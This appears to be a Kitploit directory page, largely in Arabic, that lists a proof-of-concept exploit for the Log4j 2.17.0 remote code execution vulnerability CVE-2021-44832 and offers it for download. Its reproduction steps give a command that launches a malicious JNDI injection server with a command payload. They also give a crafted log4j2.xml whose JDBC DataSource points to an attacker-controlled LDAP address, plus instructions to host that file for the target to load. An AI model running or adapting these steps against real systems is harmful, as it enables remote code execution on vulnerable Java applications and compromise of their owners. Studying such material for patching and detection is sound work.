Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j_RCE_CVE-2021-44832 — استغلال إثبات المفهوم لثغرة Log4j 2.17.0 RCE (CVE-2021-44832) باستخدام حقن JNDI ونشر ملف إعدادات خبيث. | Kitploit
أدوات/GitHubGitHub/cckuailong/log4j_rce_cve-2021-44832
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعد
GitHubcckuailong/log4j_rce_cve-2021-44832

log4j_RCE_CVE-2021-44832

استغلال إثبات المفهوم لثغرة Log4j 2.17.0 RCE (CVE-2021-44832) باستخدام حقن JNDI ونشر ملف إعدادات خبيث.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
41منذ 4 سنواتلم تتم المراجعة بعد

Log4j 2.17.0 RCE -- CVE-2021-44832

إعادة الإنتاج

  1. تشغيل خادم jndi الضار
root@kitploit:~
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

  1. قم بتعديل جزء DataSource في config/log4j2.xml إلى عنوان jndi الذي قمت بإنشائه
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
        <JDBC name="databaseAppender" tableName="dbo.application_log">
            <DataSource jndiName="ldap://127.0.0.1:1389/nvrcl6" />
            <Column name="eventDate" isEventTimestamp="true" />
            <Column name="level" pattern="%level" />
            <Column name="logger" pattern="%logger" />
            <Column name="message" pattern="%message" />
            <Column name="exception" pattern="%ex{full}" />
        </JDBC>
    </Appenders>
    <Loggers>
        <Root level="warn">
            <AppenderRef ref="databaseAppender"/>
        </Root>
    </Loggers>
</Configuration>

انشر ملف التكوين على خادم http الخاص بك

  1. تعديل Poc

قم بتعديله ليصبح ملف التكوين المنشور على خادم http

  1. التنفيذ

Log4shell Topic

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

مرحباً بك في المساهمة في reapoc

https://github.com/cckuailong/reapoc

تنزيل الأداة